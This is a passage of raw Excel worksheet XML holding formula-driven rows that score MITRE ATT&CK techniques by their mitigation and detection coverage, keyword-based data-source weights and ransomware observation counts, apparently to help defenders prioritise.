        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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35" spans="1:47">
      <c r="A335" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.0714285714285721E-2</v>
      </c>
      <c r="B335" s="25">
        <f>SUM(H335,M335,V335)*(1+SUM(AE335,AG335,AI335,AK335,AM335))</f>
        <v>0.27380952380952384</v>
      </c>
      <c r="C335" s="25" t="s">
        <v>1353</v>
      </c>
      <c r="D335" s="25" t="s">
        <v>1354</v>
      </c>
      <c r="E335" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F335" s="51">
        <v>1</v>
      </c>
      <c r="G335" s="51">
        <v>2</v>
      </c>
      <c r="H335" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I335">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J335">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K335">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L335">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M335" s="25">
        <v>0</v>
      </c>
      <c r="N335" s="51">
        <v>0</v>
      </c>
      <c r="O335" s="51">
        <v>1</v>
      </c>
      <c r="P335" s="51">
        <v>3</v>
      </c>
      <c r="Q335" s="51">
        <v>0</v>
      </c>
      <c r="R335" s="52" t="s">
        <v>1355</v>
      </c>
      <c r="S335" s="51">
        <v>3</v>
      </c>
      <c r="T335" s="52" t="s">
        <v>1356</v>
      </c>
      <c r="U335" s="51">
        <v>8</v>
      </c>
      <c r="V335" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12380952380952383</v>
      </c>
      <c r="W335">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>11</v>
      </c>
      <c r="X335">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.2</v>
      </c>
      <c r="Y335">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="Z335">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA335">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB335">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC335" s="29" t="s">
        <v>341</v>
      </c>
      <c r="AD335" s="25" t="str" cm="1">
        <f t="array" ref="AD335">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC335)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE335" s="25">
        <f>IF(AD335="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF335" s="25" t="str" cm="1">
        <f t="array" ref="AF335">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC335)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG335" s="25">
        <f>IF(AF335="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH335" s="25" t="str" cm="1">
        <f t="array" ref="AH335">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC335)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI335" s="25">
        <f>IF(AH335="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ335" s="25" t="str" cm="1">
        <f t="array" ref="AJ335">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC335)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK335" s="25">
        <f>IF(AJ335="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL335" s="25" t="str" cm="1">
        <f t="array" ref="AL335">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC335)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM335" s="25">
        <f>IF(AL335="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN335" s="60">
        <v>1</v>
      </c>
      <c r="AO335" s="51">
        <v>1</v>
      </c>
      <c r="AP335" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.0714285714285721E-2</v>
      </c>
      <c r="AQ335" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.1269841269841279E-2</v>
      </c>
      <c r="AR335" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.1269841269841279E-2</v>
      </c>
      <c r="AS335" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT335" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU33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36" spans="1:47" ht="48">
      <c r="A336" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16309999999999999</v>
      </c>
      <c r="B336" s="25">
        <f>SUM(H336,M336,V336)*(1+SUM(AE336,AG336,AI336,AK336,AM336))</f>
        <v>0.29766666666666669</v>
      </c>
      <c r="C336" s="25" t="s">
        <v>1357</v>
      </c>
      <c r="D336" s="25" t="s">
        <v>482</v>
      </c>
      <c r="E336" s="25" t="s">
        <v>1358</v>
      </c>
      <c r="F336" s="51">
        <v>1</v>
      </c>
      <c r="G336" s="51">
        <v>1</v>
      </c>
      <c r="H336" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I336">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J336">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K336">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L336">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M336" s="25">
        <v>0</v>
      </c>
      <c r="N336" s="51">
        <v>0</v>
      </c>
      <c r="O336" s="51">
        <v>0</v>
      </c>
      <c r="P336" s="51">
        <v>0</v>
      </c>
      <c r="Q336" s="51">
        <v>0</v>
      </c>
      <c r="R336" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S336" s="51">
        <v>2</v>
      </c>
      <c r="T336" s="52" t="s">
        <v>483</v>
      </c>
      <c r="U336" s="51">
        <v>11</v>
      </c>
      <c r="V336" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12380952380952381</v>
      </c>
      <c r="W336">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X336">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y336">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z336">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA336">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB336">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC336" s="29" t="s">
        <v>1359</v>
      </c>
      <c r="AD336" s="25" t="str" cm="1">
        <f t="array" ref="AD336">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC336)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE336" s="25">
        <f>IF(AD336="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF336" s="25" t="str" cm="1">
        <f t="array" ref="AF336">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC336)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG336" s="25">
        <f>IF(AF336="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH336" s="25" t="str" cm="1">
        <f t="array" ref="AH336">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC336)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI336" s="25">
        <f>IF(AH336="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ336" s="25" t="str" cm="1">
        <f t="array" ref="AJ336">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC336)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK336" s="25">
        <f>IF(AJ336="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL336" s="25" t="str" cm="1">
        <f t="array" ref="AL336">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC336)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM336" s="25">
        <f>IF(AL336="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN336" s="52">
        <v>4</v>
      </c>
      <c r="AO336" s="51">
        <v>1</v>
      </c>
      <c r="AP336" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.16309999999999999</v>
      </c>
      <c r="AQ336" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.9222222222222226E-2</v>
      </c>
      <c r="AR336" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.9222222222222226E-2</v>
      </c>
      <c r="AS336" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT336" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU33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37" spans="1:47" ht="48">
      <c r="A337" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.12976666666666667</v>
      </c>
      <c r="B337" s="25">
        <f>SUM(H337,M337,V337)*(1+SUM(AE337,AG337,AI337,AK337,AM337))</f>
        <v>0.29766666666666669</v>
      </c>
      <c r="C337" s="25" t="s">
        <v>1360</v>
      </c>
      <c r="D337" s="25" t="s">
        <v>482</v>
      </c>
      <c r="E337" s="25" t="s">
        <v>1361</v>
      </c>
      <c r="F337" s="51">
        <v>1</v>
      </c>
      <c r="G337" s="51">
        <v>1</v>
      </c>
      <c r="H337" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I337">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J337">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K337">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L337">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M337" s="25">
        <v>0</v>
      </c>
      <c r="N337" s="51">
        <v>0</v>
      </c>
      <c r="O337" s="51">
        <v>0</v>
      </c>
      <c r="P337" s="51">
        <v>0</v>
      </c>
      <c r="Q337" s="51">
        <v>0</v>
      </c>
      <c r="R337" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S337" s="51">
        <v>2</v>
      </c>
      <c r="T337" s="52" t="s">
        <v>483</v>
      </c>
      <c r="U337" s="51">
        <v>11</v>
      </c>
      <c r="V337" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12380952380952381</v>
      </c>
      <c r="W337">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X337">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y337">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z337">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA337">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB337">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC337" s="29" t="s">
        <v>127</v>
      </c>
      <c r="AD337" s="25" t="str" cm="1">
        <f t="array" ref="AD337">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC337)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE337" s="25">
        <f>IF(AD337="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF337" s="25" t="str" cm="1">
        <f t="array" ref="AF337">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC337)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG337" s="25">
        <f>IF(AF337="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH337" s="25" t="str" cm="1">
        <f t="array" ref="AH337">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC337)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI337" s="25">
        <f>IF(AH337="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ337" s="25" t="str" cm="1">
        <f t="array" ref="AJ337">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC337)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK337" s="25">
        <f>IF(AJ337="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL337" s="25" t="str" cm="1">
        <f t="array" ref="AL337">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC337)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM337" s="25">
        <f>IF(AL337="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN337" s="60">
        <v>3</v>
      </c>
      <c r="AO337" s="51">
        <v>1</v>
      </c>
      <c r="AP337" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.12976666666666667</v>
      </c>
      <c r="AQ337" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.9222222222222226E-2</v>
      </c>
      <c r="AR337" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.9222222222222226E-2</v>
      </c>
      <c r="AS337" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT337" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU33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38" spans="1:47" ht="32.1">
      <c r="A338" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.9766666666666667E-2</v>
      </c>
      <c r="B338" s="25">
        <f>SUM(H338,M338,V338)*(1+SUM(AE338,AG338,AI338,AK338,AM338))</f>
        <v>0.29766666666666669</v>
      </c>
      <c r="C338" s="25" t="s">
        <v>1362</v>
      </c>
      <c r="D338" s="25" t="s">
        <v>1363</v>
      </c>
      <c r="E338" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F338" s="51">
        <v>1</v>
      </c>
      <c r="G338" s="51">
        <v>1</v>
      </c>
      <c r="H338" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I338">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J338">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K338">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L338">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M338" s="25">
        <v>0</v>
      </c>
      <c r="N338" s="51">
        <v>0</v>
      </c>
      <c r="O338" s="51">
        <v>0</v>
      </c>
      <c r="P338" s="51">
        <v>0</v>
      </c>
      <c r="Q338" s="51">
        <v>0</v>
      </c>
      <c r="R338" s="52" t="s">
        <v>1364</v>
      </c>
      <c r="S338" s="51">
        <v>4</v>
      </c>
      <c r="T338" s="52" t="s">
        <v>1365</v>
      </c>
      <c r="U338" s="51">
        <v>9</v>
      </c>
      <c r="V338" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.12380952380952381</v>
      </c>
      <c r="W338">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X338">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y338">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z338">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA338">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB338">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC338" s="29" t="s">
        <v>1105</v>
      </c>
      <c r="AD338" s="25" t="str" cm="1">
        <f t="array" ref="AD338">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC338)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE338" s="25">
        <f>IF(AD338="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF338" s="25" t="str" cm="1">
        <f t="array" ref="AF338">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC338)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG338" s="25">
        <f>IF(AF338="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH338" s="25" t="str" cm="1">
        <f t="array" ref="AH338">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC338)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI338" s="25">
        <f>IF(AH338="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ338" s="25" t="str" cm="1">
        <f t="array" ref="AJ338">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC338)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK338" s="25">
        <f>IF(AJ338="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL338" s="25" t="str" cm="1">
        <f t="array" ref="AL338">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC338)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM338" s="25">
        <f>IF(AL338="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN338" s="60">
        <v>0</v>
      </c>
      <c r="AO338" s="51">
        <v>0</v>
      </c>
      <c r="AP338" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.9766666666666667E-2</v>
      </c>
      <c r="AQ338" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.9222222222222226E-2</v>
      </c>
      <c r="AR338" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.9222222222222226E-2</v>
      </c>
      <c r="AS338" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT338" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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39" spans="1:47" ht="48">
      <c r="A339" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.9766666666666667E-2</v>
      </c>
      <c r="B339" s="25">
        <f>SUM(H339,M339,V339)*(1+SUM(AE339,AG339,AI339,AK339,AM339))</f>
        <v>0.29766666666666669</v>
      </c>
      <c r="C339" s="25" t="s">
        <v>1366</v>
      </c>
      <c r="D339" s="25" t="s">
        <v>1367</v>
      </c>
      <c r="E339" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F339" s="51">
        <v>1</v>
      </c>
      <c r="G339" s="51">
        <v>1</v>
      </c>
      <c r="H339" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I339">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J339">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K339">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L339">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M339" s="25">
        <v>0</v>
      </c>
      <c r="N339" s="51">
        <v>0</v>
      </c>
      <c r="O339" s="51">
        <v>0</v>
      </c>
